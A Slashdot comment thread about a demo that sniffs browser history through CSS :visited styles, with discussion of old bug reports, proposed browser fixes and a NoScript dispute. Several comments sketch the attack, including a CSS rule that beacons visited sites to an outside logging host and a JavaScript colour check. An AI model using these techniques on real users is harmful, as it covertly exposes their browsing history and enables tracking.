
Sniffing Browser History Without Javascript

kdawson posted more than 5 years ago | from the hole-in-css dept.

Security 216

Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."


216 comments


damnit (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#28323655)

hotgaycock.cum again?

oh well... i do enjoy the meat missile!

Re:damnit (0, Offtopic)

Tubal-Cain (1289912) | more than 5 years ago | (#28323769)

.cum

They started handing out custom TLDs already?

Well, we fixed it... (4, Funny)

slarrg (931336) | more than 5 years ago | (#28323667)

You can't tell what sites I've been to if it's Slashdotted!

Another workaround... (1)

raehl (609729) | more than 5 years ago | (#28325039)

Only visit really obscure por... dating sites.

Old stuff (5, Informative)

kasot (1274250) | more than 5 years ago | (#28323679)

The CSS history hack has been known since (at least) August 2006: http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html [blogspot.com]

Re:Old stuff (4, Informative)

Anonymous Coward | more than 5 years ago | (#28323873)

Long before that, honestly.

There are Firefox extensions that can help protect against this (see http://www.safecache.com/ and http://www.safehistory.com/ ), but they break enough things on the web that even their creators admit they're not terribly practical.

(Disclaimer: Two of the folks that worked on this also worked for awhile on Chromium with me.)

Re:Old stuff (2, Interesting)

rytier (175186) | more than 5 years ago | (#28324965)

moderation undo (sorry for OT)...

Re:Old stuff (0)

Anonymous Coward | more than 5 years ago | (#28323895)

it appears to me that your 'Old stuff' link requires JavaScript (I turned off JavaScript, it begs me to turn it on). I can't check the current story's link due to slashdot effect, but if TFS is to be believed, no JavaScript is required on the link it contains.

Re:Old stuff (5, Informative)

zmooc (33175) | more than 5 years ago | (#28323947)

Bug 57351 - css on a:visited can load an image and/or reveal if visitor been to a site
Reported: 2000-10-19 16:57 PDT by Jesse Ruderman

Re:Old stuff (5, Informative)

glodime (1015179) | more than 5 years ago | (#28324335)

Bug 57351

Was marked as a duplicate of 147777
See: https://bugzilla.mozilla.org/show_bug.cgi?id=147777 [mozilla.org]

Vitaly Sharovatov and Walt Gordon Jones have an interesting back and forth on ideas for a proper fix. Search the page linked below for "Walt Gordon Jones" to follow the conversation.
http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/ [wordpress.com]

Walt Gordon Jones summarizes his point:

The idea that the only way to protect your history data is to give up keeping history at all seems broken to me. Just because the information is in the browser, and I may use it in other ways, doesn't mean it has to be used to mark up the rendered HTML on sites I visit. There's nothing that inextricably ties history to the browser's rendering engine.

Re:Old stuff (1, Interesting)

Anonymous Coward | more than 5 years ago | (#28324767)

The simplest partial solution is to make CSS visited links expire after 1 hour to minimize its effects. Yet still retain the history in your browser for 2 months, so that you can still search it.

Re:Old stuff (2, Interesting)

black6host (469985) | more than 5 years ago | (#28325023)

Sure... Me, I can just turn off my history if I don't want sites sniffing it this way. What ever made me think, in this day and age, that anything I do, on the net or not, is private?

Sorry, not to bash you, just sad commentary.....

Re:Old stuff (2, Interesting)

Blakey Rat (99501) | more than 5 years ago | (#28324961)

Can you perhaps explain the non-Javascript version in simpler terms than what's on the story's webpage? The explanation on the page is either very vague, or over my head. (Or both.)

I fully understand how you can use Javascript to grab the computed style of the A tag and figure out if it matches the ":visited" style you have defined, but what I don't get is how he's grabbing the style using only server-side technologies. Since when is it possible for a web server to tell the computed style of an element?

Re:Old stuff (2, Interesting)

Blakey Rat (99501) | more than 5 years ago | (#28324997)

Oh wait, I think I just got it.

What he's doing is setting your CSS A:visited property to a image URL, which is defined based on your browser session. Something like:
a:visited { background-image: url( http://scansite.com/image.gif?s=yahoo_com&c=45353535 [scansite.com] ); } Then he's coded up a PHP script that'll log the code at the end of the image URL, and track it in your PHP session variable, or a database.

So, the flowchart looks like:
1) User visits page
2) PHP script generates session ID for the visit
3) PHP script writes an invisible iframe to the page, which includes
  - a link to a Target URL (the URL you're trying to find in the history)
  - a CSS rule defining the A:visited image to be a particular URL + a code for the Target URL + your session ID
  - a meta-refresh tag that instructs the server to refresh the iframe with the next Target URL on the list
4) When the iframe refreshes, the PHP feeds out a list of which Target URLs your session ID has been seen at

Ironically, IE's dubious "click on reload/redirect" feature is (currently) the most effective defense against this technique, as the user isn't likely to notice the constant clicks emanating from their browser while this attack is taking place.

Clever stuff. Someone let me know if I'm off-base on this explanation, but if it's not exactly what he's doing, I'm sure this would work as well.

Will it.. (0)

NervousNerd (1190935) | more than 5 years ago | (#28323689)

Will it know if I've gone on Goatse?

Re:Will it.. (4, Informative)

orange47 (1519059) | more than 5 years ago | (#28323707)

it's easy to tell, with that nickname of yours.. :)

big issue is NoScript (5, Informative)

bcrowell (177657) | more than 5 years ago | (#28323691)

I'd care a lot more about this if NoScript was still a viable option. NoScript has become malware at this point. [wikipedia.org] The real issue is the need for someone more trustworthy to make a simpler, and more trustworthy replacement for NoScript. Please? Pretty please?

Re:big issue is NoScript (0, Troll)

Anonymous Coward | more than 5 years ago | (#28323765)

Stop overreacting, that is old news and long since fixed. NoScript is no more "malware" than Firefox itself.

I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit, yet you single NoScript out for one tiny misstep made and quickly corrected some time back.

Re:big issue is NoScript (5, Insightful)

bcrowell (177657) | more than 5 years ago | (#28323913)

Stop overreacting, that is old news and long since fixed.

Letting someone else's code run on my computer is an act of trust. Once they've shown they're untrustworthy, that's it, as far as I'm concerned. The world's best security software is no good if the author is someone who's demonstrated at least once that you can't trust him.

NoScript is no more "malware" than Firefox itself.

This is an interesting statement, but I don't understand your reasoning. Maybe you could explain more. Have the developers of Firefox done something untrustworthy?

I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit,

I don't understand how you know so much about my computer. Maybe you could explain more how you became so well informed about what's on my hard disk. I'm running Ubuntu. Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system? Are you aware of a lot of malware that's been observed in the wild infecting Ubuntu systems? If so, I'd be very interested to hear about it.

Re:big issue is NoScript (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28324663)

that shows a serious lack of understanding/empathy to give people one chance before you stop trusting them.

nobody is perfect and those who seem so are lying.

Re:big issue is NoScript (5, Interesting)

Anonymous Coward | more than 5 years ago | (#28323799)

This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!

Re:big issue is NoScript (1, Insightful)

bcrowell (177657) | more than 5 years ago | (#28323881)

Hmm...my GP post is modded -1 troll, and the parent post, which says "This is not a troll," and explains why, is also modded -1 troll. It's too bad that you can't both mod and comment; I'd have liked to know why the mods thought there was something trollish about both posts.

Re:big issue is NoScript (2, Informative)

gavron (1300111) | more than 5 years ago | (#28323967)

You CAN mod and comment. When you make the comment, the mods you made go away. If you comment first, you cannot mod.

So the mods could come in here and explain, but then their mods would be gone :)

Heisenberg, we hardly knew ya.

E

Re:big issue is NoScript (1)

MobileTatsu-NJG (946591) | more than 5 years ago | (#28324143)

You CAN mod and comment. When you make the comment, the mods you made go away.

Oh brother. Lucky for you I can comment but not mod.

OT: Re:big issue is NoScript (1)

John Meacham (1112) | more than 5 years ago | (#28324593)

Indeed. The "no mod and comment" rule is perhaps one of the most ill-conceived rules I have seen. It just ensures the people moderating on a topic are the ones who aren't knowledgeable enough to comment on it (or vice versa). Unscrupulous people can just use sockpuppet accounts to moderate so it really only affects honest users who are likely the ones who will add value by commenting and moderating.

Re:OT: Re:big issue is NoScript (5, Insightful)

BrokenHalo (565198) | more than 5 years ago | (#28324745)

the "no mod and comment" rule is perhaps one of the most ill-conceived rules I have seen.

Then perhaps you haven't understood the concept behind the rule. The idea is to prevent individuals having unrestrained ability to push an agenda of their own: hence mod or post, but not both.

Unlike some other long-standing rules on this forum, this is one that actually has very sound reasoning behind it.

Re:OT: Re:big issue is NoScript (0)

Anonymous Coward | more than 5 years ago | (#28324979)

I used to keep an alt account active specifically so that I could mod down my opponents. Even though slashdot goes so far as to portscan you before you can post, it was too stupid to figure out this trick.

Re:big issue is NoScript (1)

davidsyes (765062) | more than 5 years ago | (#28324691)

"I'd have liked to know why the mods thought there was something trollish about both posts."

Mybe thye aer gliffing snue jithout wava....?

Trolls (1, Troll)

iYk6 (1425255) | more than 5 years ago | (#28325045)

Trolls are given mod points too.

Re:big issue is NoScript (3, Informative)

mrmeval (662166) | more than 5 years ago | (#28324089)

He was trying to work around a problem with easylist and handled it badly but easylist is as much to blame for targeting him.

He answers his emails if you care to ask but easylist has ignored me so far.

Re:big issue is NoScript (5, Insightful)

Korin43 (881732) | more than 5 years ago | (#28324541)

Easylist blocks ads. Easylist blocked an ad on his site. How is this their fault? They are doing exactly what they say they do.

Re:big issue is NoScript (1)

melikamp (631205) | more than 5 years ago | (#28323885)

It seems like it's been fixed [noscript.net] .

Re:big issue is NoScript (5, Insightful)

bcrowell (177657) | more than 5 years ago | (#28323943)

It seems like it's been fixed.

The issue isn't that the software had a bug that had to be fixed. The issue is that the author of the software has shown himself to be untrustworthy by making his software interfere with other software, for the purpose of increasing his own financial gain from ads.

Re:big issue is NoScript (3, Insightful)

Blue Stone (582566) | more than 5 years ago | (#28324233)

If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to apologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

Unless you're one of those people who believes that anyone less than perfect with a flawless record of behaviour deserves to be castigated for all time for their transgressions, I suggest you consider a concept called 'forgiveness' which, I believe, is most appropriate where the transgressor shows genuine remorse. It seems applicable in this situation, but of course, I can only speak for myself.

(I don't know the guy & I use both noscript and adblock+ with easylist)

Re:big issue is NoScript (0)

Anonymous Coward | more than 5 years ago | (#28324551)

forgiveness? Can I download that from the app store?

Re:big issue is NoScript (1)

Barny (103770) | more than 5 years ago | (#28324635)

Nope, it can only be given, never purchased, kinda like early gmail beta.

Re:big issue is NoScript (1, Insightful)

Anonymous Coward | more than 5 years ago | (#28324657)

You certainly speak for quite a few more than yourself. I for one am really glad someone said it - personally I think a lot of people got way too upset about this, many of which (from the arguments I've read) did not really understand the issue.

Re:big issue is NoScript (5, Informative)

VGPowerlord (621254) | more than 5 years ago | (#28324703)

If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to apologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

From what I hear, he only "apologized" and fixed the problem for several reasons:
1. Because the Firefox devs said that NoScript was breaking Firefox's Add-on Policy [mozilla.org] when it started monkeying around with AdBlock Plus.
2. NoScript's rating was plummeting on the Firefox Add-on site. If this rating drops too much, NoScript would no longer be considered a trusted add-on, and therefore every version would be subject to security review before it exited the Sandbox [mozilla.org] .

Oh, yes, you read that correctly. NoScript is currently not reviewed before new versions go up on the Firefox add-on site.

Incidentally, Mozilla made a new policy [mozilla.com] spelling out some restrictions for add-ons after this incident.

Re:big issue is NoScript (5, Insightful)

supernova_hq (1014429) | more than 5 years ago | (#28324959)

Don't confuse forgiveness with trust.

If someone borrowed your car and backed into a telephone pole, you would be upset. If they paid for the damages, you would probably forgive them. But the question is: Would you trust them with your car..?

Re:big issue is NoScript (4, Interesting)

MikeURL (890801) | more than 5 years ago | (#28324229)

I temporarily uninstalled noscript but I've since put it back on. He admitted a mistake and fixed it. I think that, on balance, I'd rather risk noscript than the endless javascript exploits out there.

Re:big issue is NoScript (4, Interesting)

NimbleSquirrel (587564) | more than 5 years ago | (#28324579)

On the surface it seems like NoScript had descended into the point of malware, but take a look into the history of why Giorgio did what he did [hackademix.net] and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.

Yes, there needs to be a more trustworthy NoScript, but at the same time there also needs to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.

I, personally, have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.

Re:big issue is NoScript (2, Interesting)

Barny (103770) | more than 5 years ago | (#28324675)

Yeah, I find a proxy based solution much better for keeping the bad things out, also has the bonus of protecting my steam browser, my mobile phone browser (when browsing on my wireless) and other in-game browsers for different games.

NoScript is to stop a problem specific to that web browser (namely its masochistic tendency to run scripting like it was "the last line of crack it was ever going to get"), whereas ad sites are needed to be blocked no matter what browser you are on (even lynx).

How to interpret results (4, Funny)

noidentity (188756) | more than 5 years ago | (#28323709)

If the server responds

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

then it means you've come from Slashdot.

For the Masses (1, Interesting)

retech (1228598) | more than 5 years ago | (#28323773)

Most people will never understand and basic exploits like this will always work against them. At what point is it the browser's (and app support staff) responsibility to protect the ignorant? The simple fix for this and many things similar is to not cache, don't keep a history, lock your browser down. If you're too stupid to do that... it's kind of your own fault.

Does a car manufacturer have a responsibility to make you drive safe? They make the car and if you're too stupid to learn how to use it properly you'll be weeded out.

Re:For the Masses (3, Insightful)

CopaceticOpus (965603) | more than 5 years ago | (#28323829)

Anyone who allows their browser to cache and keep a history is stupid? Perhaps your tin foil hat is a size too small.

Re:For the Masses (2, Informative)

digitalunity (19107) | more than 5 years ago | (#28323845)

Maybe just clear your cache more often. It's easy, fast and good practice. Ctrl-Shift-Del, press enter.

Do this every time you close FF.

Re:For the Masses (4, Insightful)

Goaway (82658) | more than 5 years ago | (#28323857)

Some of us actually use the browser history.

Re:For the Masses (0)

Anonymous Coward | more than 5 years ago | (#28323927)

I like having my browser history so I can tell if I've read something or not.

Though I do keep it limited to two days.

Honestly, though, I really don't get what all the fuss is about in regards to sites finding out what other sites you visit. Sure, it's an invasion of privacy, but beyond that I don't see how it can be used against you. Unless you're visiting illegal sites.

But if all sites I visit are also visited by thousands of other people each day, why should I care if someone out there on the 'net knows that I'm one of those thousands?

Re:For the Masses (5, Funny)

Opportunist (166417) | more than 5 years ago | (#28324021)

And some of us use one browser for their everyday surfing and one for the naughty pages... I mean, I would do that if I surfed to naughty pages, of course...

Re:For the Masses (2, Informative)

sootman (158191) | more than 5 years ago | (#28324099)

Small but important distinction: this exploit is for browser history, not cache. That shortcut (or shift-command-delete* on a Mac) will bring up the 'clear private data' dialog which covers browser history (the one this exploit is for), download history, saved form and search history, browser cache, and other items.

* Unlike PCs, which have 'backspace' and '(forward) delete' buttons, Macs have two buttons labeled 'delete' or 'del'--the big one which is backspace, and the small one next to help, home, end, etc., which is forward delete. That's the one you need for this shortcut. I imagine laptop users and people who use those new small keyboards are SOL.

Re:For the Masses (1)

NoMaster (142776) | more than 5 years ago | (#28324267)

* Unlike PCs, which have 'backspace' and '(forward) delete' buttons, Macs have two buttons labeled 'delete' or 'del'--the big one which is backspace, and the small one next to help, home, end, etc., which is forward delete. That's the one you need for this shortcut. I imagine laptop users and people who use those new small keyboards are SOL.

In theory, the Mac's Fn key modifies the "delete" key to "del", so laptop / new keyboard users aren't so much SOL as "need to use another finger".

In practice, however, it doesn't matter - on my '06/'07 model Core2Duo MacBook, shift-command-delete works fine & brings up the FF dialogue - as does shift-fn-command-delete.

Re:For the Masses (5, Insightful)

MightyYar (622222) | more than 5 years ago | (#28323973)

Most people will never understand and basic exploits like this will always work against them.

So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

Re:For the Masses (mod parent up) (1)

Mjec (666932) | more than 5 years ago | (#28324327)

The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

I never, ever thought I'd write a post with "mod parent up" in the subject line but this is genius. Perfect solution to all these web-bug issues and really just another form of prefetching.

Re:For the Masses (3, Interesting)

dmomo (256005) | more than 5 years ago | (#28324481)

It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality altogether. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.

If a page has the rule: a:visited { color: red; }

And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');

I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.

The point here is, the solution is not dead simple.

Re:For the Masses (0)

Anonymous Coward | more than 5 years ago | (#28324883)

Most people most vulnerable to this don't use the 'visited' functionality anyway, so YES, that would be a fix.

Re:For the Masses (1)

dissy (172727) | more than 5 years ago | (#28324485)

So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

Yes, that is a brilliant solution, and to me (Probably in hindsight to your comment) just seems like the most sane action for the browser to take anyway.

It does make the prefetch data that needs to be transferred larger, but for most people I don't think that would be a big deal anyway, and especially so if pointed out of this attack it counters.
At the very worst it could be an option in about:config that defaults to always load, which could be disabled back to current behavior if data transfer is that much of a concern (as you already would want to cut down other prefetch options in that case.)

I have to question however, is there really a good need or use for a hidden flag on iframes at all??
I honestly don't know, maybe it's one of the more handy features in there, and I just don't see it from the user side of things, but 'hidden' is not an attribute I would ever imagine wanting on a frame or iframe...

Re:For the Masses (0)

Anonymous Coward | more than 5 years ago | (#28324147)

The simple fix for this and many things similar is to not cache, don't keep a history, lock your browser down. If you're too stupid to do that... it's kind of your own fault.

...which would be a lot easier if I could run two separate instances of Firefox simultaneously.

Instead, Firefox checks to see if a copy of itself is already resident, and if so, it pops open a new window. A simple command-line option to "run me in a separate process space even if I think I'm already running" would suffice.

Chrome (1)

Runaway1956 (1322357) | more than 5 years ago | (#28324325)

Some browsers DO allow running a second instance.

Send Firefox developers a polite nasty-gram, telling them that you want the ability to open a second, third, or even fourth instance of FF in separate memory space.

Re:Chrome (4, Informative)

Z80xxc! (1111479) | more than 5 years ago | (#28324363)

would be a lot easier if I could run two separate instances of Firefox simultaneously.

Send Firefox developers a polite nasty-gram, telling them that you want the ability to open a second, third, or even fourth instance of FF in separate memory space.

This functionality already exists [mozillazine.org] .

"%programfiles%\Mozilla Firefox\firefox.exe" -P "profile to use" -no-remote

Re:Chrome (1)

Runaway1956 (1322357) | more than 5 years ago | (#28324443)

Mod parent up, people.

To be perfectly honest, I think I've read that article before - or one very much like it. Because I didn't see a need for it, I just forgot it.

Thank you, Z80xxc!

Re:For the Masses (1)

hairyfeet (841228) | more than 5 years ago | (#28324503)

Run Firefox in one and Seamonkey [seamonkey-project.org] in the other. Seamonkey the browser component is nothing but Firefox, and even many Firefox extensions work just fine with Seamonkey. You can choose browser only on install if you don't want/need the email, IRC chat, or HTML editor. Plus it is nice to have a "guest browser" for when you have.....guests.

Or if you are on Windows you also have the choices of Kmeleon [sourceforge.net] or KmeleonCCFME [blogspot.com] . Both are superfast Win32 native gecko engine builds, but they don't have as many extensions due to not using XUL. Of the two Kmeleon is great if you want it installed, but I prefer KmeleonCCFME because it comes with ABP installed and is already portable. Just unzip to a flash and go.

This IMHO is one of the great things about Open Source software. If you think you have a better idea you are free to fork it your own way. I have found Seamonkey to be very useful for getting my older clients away from Outlook Express/IE, and Kmeleon/CCFME is simply very fast on Windows.

Doesn't work on me (2, Informative)

MrMista_B (891430) | more than 5 years ago | (#28323793)

Doesn't work on me - Firefox, with adblock plus, element hiding helper, and flashblock, running whatever the latest Ubuntu is.

Re:Doesn't work on me (4, Funny)

Kotoku (1531373) | more than 5 years ago | (#28323811)

Awesome! Now for all the people who can take and act upon that advice, we can protect .000001% of the population.

It's a start!

Re:Doesn't work on me (1)

Frosty Piss (770223) | more than 5 years ago | (#28323891)

Returned no results for me. FireFox on Windows, no adblock or noscript.

Re:Doesn't work on me (0)

Anonymous Coward | more than 5 years ago | (#28324641)

It took a minute for me - I think I had to mouse over the window. Then I got a short, accurate list of results. Firefox on Leopard, running adblock and noscript.

However, it didn't find anything that was visited during a Distrust session, so there's no harm here....

Re:Doesn't work on me (1)

ElKry (1544795) | more than 5 years ago | (#28323975)

Worked for me, Iceweasel with NoScript in debian SID 64bits.

Re:Doesn't work on me (0)

Anonymous Coward | more than 5 years ago | (#28324903)

Now you're safe from people finding out how depraved you are. Except /. but we'd never use that information against you :>

Old, sure... (3, Interesting)

sootman (158191) | more than 5 years ago | (#28323795)

... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)

Web Bug Blockers (1)

furbearntrout (1036146) | more than 5 years ago | (#28323861)

Eg. IMG like opera..
You should only load remote images on demand.
Sounds like a no-brainer to me.

Yeah, I know must be new here..

Re:Web Bug Blockers (2, Informative)

Snowblindeye (1085701) | more than 5 years ago | (#28324261)

You should only load remote images on demand.

[...]

Yeah, I know must be new here..

You're not new here, I can tell by the fact that you didn't read the article. Or the summary ;)

This feature actually works like you want it to: It *does* load on demand. And that's the problem here. If it always loaded it this exploit wouldn't work. It's based on only being loaded on demand.

It requires an iframe, so noscript will help you (1)

Logic Worshipper (1518487) | more than 5 years ago | (#28323887)

since noscript blocks iframes, if you configure it properly.

Re:It requires an iframe, so noscript will help yo (5, Informative)

yacc143 (975862) | more than 5 years ago | (#28323951)

It does not require an iframe. It's just that this way it's easier to hide any visual clues.

The basic hack works simply. It sets a different style for visited links. (As such it will only match exact URLs). And one of the cool things your style for visited links specifies is a background URL that works as a webbug.

yacc

Re:It requires an iframe, so noscript will help yo (1)

a-zA-Z0-9$_.+!*'(),x (1468865) | more than 5 years ago | (#28324061)

You're right. You can just add the attribute "hidden" and stick it at -9999 and the user won't see it.

tOM

Re:It requires an iframe, so noscript will help yo (1)

yacc143 (975862) | more than 5 years ago | (#28324919)

Well, hidden might well turn off the complete processing.

OTOH, yes, I think there are a number of ways to hide the links with CSS (foreground == background comes to mind).

yacc

Re:It requires an iframe, so noscript will help yo (0)

Anonymous Coward | more than 5 years ago | (#28324777)

You know what, if you really feel you must repeat your username again as a sig, why not put it in the sig field so we can all filter that stupid crap out.

Clever and evil (1)

dandart (1274360) | more than 5 years ago | (#28323901)

+1 Evil

According to their scanner ive visited... (0)

Anonymous Coward | more than 5 years ago | (#28323989)

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

defeated (1)

Skapare (16644) | more than 5 years ago | (#28324527)

That's the Slashdot Effect [wikipedia.org] at work protecting your privacy.

Alarming? (2, Insightful)

actionbastard (1206160) | more than 5 years ago | (#28324015)

From an exploit standpoint, no. From an editorial standpoint, yes.

Re: Alarming? (2, Funny)

transporter_ii (986545) | more than 5 years ago | (#28324055)

Well, at least I don't have the hiccups any more.
.
.

Just ... (-1, Troll)

PPH (736903) | more than 5 years ago | (#28324067)

... put me down for a few visits to Goatse and save yourself a lot of trouble.

How To Fix Without Breaking CSS (1)

The MAZZTer (911996) | more than 5 years ago | (#28324071)

Normally the browser won't load a CSS-defined external resource if it's not required, but in this case, for links it should load resources under :visited for any link, visited or not. This way this PoC would return visited for any random site, they really wouldn't get any useful data. However 1) it uses a bit more bandwidth fetching images that may not be used, although they are precached in the event the links do end up being clicked and 2) false positives on sites which use this for targeted ads etc might trigger said ads.

My idea for a fix for the JS version of the exploit (IIRC it's where you fetch the style information for a link, say, its color, and have visited links colored differently from unvisited) would be to have any JS queries against CSS on links return the styling of the link if it WASN'T visited... regardless of whether it actually is or not. Shouldn't break any web apps unless someone uses it like an HTTP referer to see if you came from their site to the current page or something...

Re:How To Fix Without Breaking CSS (2, Interesting)

Skapare (16644) | more than 5 years ago | (#28324153)

IMHO a better fix is to completely disable looking up browser history for link styling. Let it treat all links as unvisited if there is no difference in styling these different classes of links. Make it the default to use the same style (most people don't care). Then re-enable the lookup if the styles are changed and the result of the change is 2 or more different styles (and pop up a warning that JS and CSS can see these style variations and this can expose detection of sites you have visited).

Re:How To Fix Without Breaking CSS (1)

nacturation (646836) | more than 5 years ago | (#28325033)

The GP's solution doesn't break any functionality while at the same time making this exploit useless. If background images can be used to detect visit status, then just load them all regardless of visit status but still display them correctly to the user. The current implementation selectively loads only the ones that will get displayed, which is what makes this exploit possible. If queried via javascript (the other attack vector) always return the unvisited state.

Everything still works 100% in that the user sees what they always expected to see, but a malicious site will not be able to gather any information. Your solution of "completely disabling browser history for link styling" breaks functionality which, to me, isn't a better fix.

In Soviet Russia, web sites visit you (3, Interesting)

Skapare (16644) | more than 5 years ago | (#28324117)

I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc., for each site I visit by the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window": well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

Re:In Soviet Russia, web sites visit you (2, Insightful)

Anonymous Coward | more than 5 years ago | (#28324169)

Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

Script plz?

This has been a pet peeve of mine for ages. I've got a bunch of users in a Windows environment without Cygwin, but I'd translate the shell script into DOS .BAT if that's what it takes to solve this problem.

Re:In Soviet Russia, web sites visit you (0)

Anonymous Coward | more than 5 years ago | (#28324439)

For when you don't need/want all of Cygwin, you can use this little package of Unix utilities [sourceforge.net]. It covers the basic Unix commands and includes a basic shell.

Re:In Soviet Russia, web sites visit you (1)

Skapare (16644) | more than 5 years ago | (#28324487)

The script is rather large because it has a lot of other customization in it.

Re:In Soviet Russia, web sites visit you (1)

Minwee (522556) | more than 5 years ago | (#28324303)

Canadian zip code humor: http://tinyurl.com/V4G1N4 [tinyurl.com]

That would be a lot funnier if Canada actually used zip codes. Or "humor". But at least you spelled the first word right.

Re:In Soviet Russia, web sites visit you (1)

BikeHelmet (1437881) | more than 5 years ago | (#28324331)

That was supposed to be funny, right? I can't imagine anyone going to that much effort. Are you also running it in a virtual machine?

Anyway... I scanned with it, and it found nothing. But since my browser has no history, maybe that's affecting it.

Re:In Soviet Russia, web sites visit you (1)

Skapare (16644) | more than 5 years ago | (#28324499)

I wrote the script for many reasons. It customizes the browser on the fly, too. For example, it codes the process ID of the shell that parents it into the localnet IP address configured to connect to the proxy server with. That way I can track connections back to specific browser instances. It also puts the process ID into the default home page after "#". There are some other customizations, some controlled by environment variables. And it is not yet converted to FF 3 (error: out of space on todo plate).

Re:In Soviet Russia, web sites visit you (2, Informative)

Blakey Rat (99501) | more than 5 years ago | (#28324953)

So... you posted just to brag about the extreme efforts you go to to support your irrational paranoia?

Thanks, I guess?

Actually (1)

Cylix (55374) | more than 5 years ago | (#28324329)

There are several firefox plugins which limit and reduce your history.

I don't think the NoScript fellows are specifically targeting anonymity, but rather simply choosing what actions (in a volatile world) can be executed.

There exist a world of many more precautions to take for those who are worried about keeping their privacy.

Lynx (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28324343)

Does it work on Lynx?

Besides visited sites... (1)

sam0737 (648914) | more than 5 years ago | (#28324441)

For sites that allow users to post CSS content, and where there is interest in stealing the cookie, it could be done in the same way.
For example, xanga.com (cookie to steal your login info), or forum/BBS sites that allow posting CSS.

The cookies will be sent along with the CSS background request.

Blogger/Blogspot is a good example of how this should be handled... just put it in two different domains.
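A site that lets users post CSS can enforce the separate-domain idea sam0737 mentions at submission time: keep any `url()` reference that stays relative or points at a cookieless asset host, and drop declarations that would fetch from anywhere else. The sanitizer below is an added example (my own code, not Blogger's or xanga's, and not part of the thread); `usercontent-assets.example` is a placeholder for the asset host, the user CSS is constructed for the example, and declarations are split on `;`, so a real deployment would want a proper CSS parser that understands `data:` URIs containing semicolons.

```python
import re
from urllib.parse import urlparse

# Hypothetical cookieless host for user-uploaded images; placeholder name.
ASSET_HOST = "usercontent-assets.example"

# Constructed user-submitted CSS: one legitimate asset reference, one history
# beacon on :visited, and one protocol-relative reference to an outside host.
SAMPLE_USER_CSS = """
.profile { color: #333; background: url(https://usercontent-assets.example/u42/bg.png); }
a:visited { color: #808; background: url(https://tracker.example/log?u=42); }
.sig { background-image: url('//tracker.example/sig.gif'); font-style: italic; }
"""

RULE_RE = re.compile(r'([^{}]+)\{([^{}]*)\}', re.S)
URL_RE = re.compile(r'url\(\s*[\'"]?([^\'")\s]*)[\'"]?\s*\)', re.I)


def url_allowed(ref):
    """Relative references stay on the site's own origin; absolute ones must be
    https on the asset host. Anything else (other hosts, protocol-relative
    //host paths, non-http schemes) is refused."""
    p = urlparse(ref)
    if not p.scheme and not p.netloc:
        return True
    return p.scheme == "https" and p.netloc.lower() == ASSET_HOST


def sanitize_user_css(css):
    """Return (clean_css, dropped): the stylesheet with offending declarations
    removed, and a list of (selector, declaration) pairs that were removed."""
    dropped, out = [], []
    for m in RULE_RE.finditer(css):
        selector = m.group(1).strip()
        kept = []
        for decl in m.group(2).split(';'):
            decl = decl.strip()
            if not decl:
                continue
            if all(url_allowed(r) for r in URL_RE.findall(decl)):
                kept.append(decl)
            else:
                dropped.append((selector, decl))
        if kept:
            out.append(f"{selector} {{ {'; '.join(kept)}; }}")
    return "\n".join(out), dropped


if __name__ == '__main__':
    clean, dropped = sanitize_user_css(SAMPLE_USER_CSS)
    print(clean)
    for selector, decl in dropped:
        print(f'dropped from {selector!r}: {decl}')
```

On the sample the `.profile` background survives, the `a:visited` beacon and the `.sig` off-site image are dropped, and the remaining colour and font declarations are kept, so the user's styling still works while nothing they post can make another visitor's browser call out to a third party.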

Re:Besides visited sites... (0)

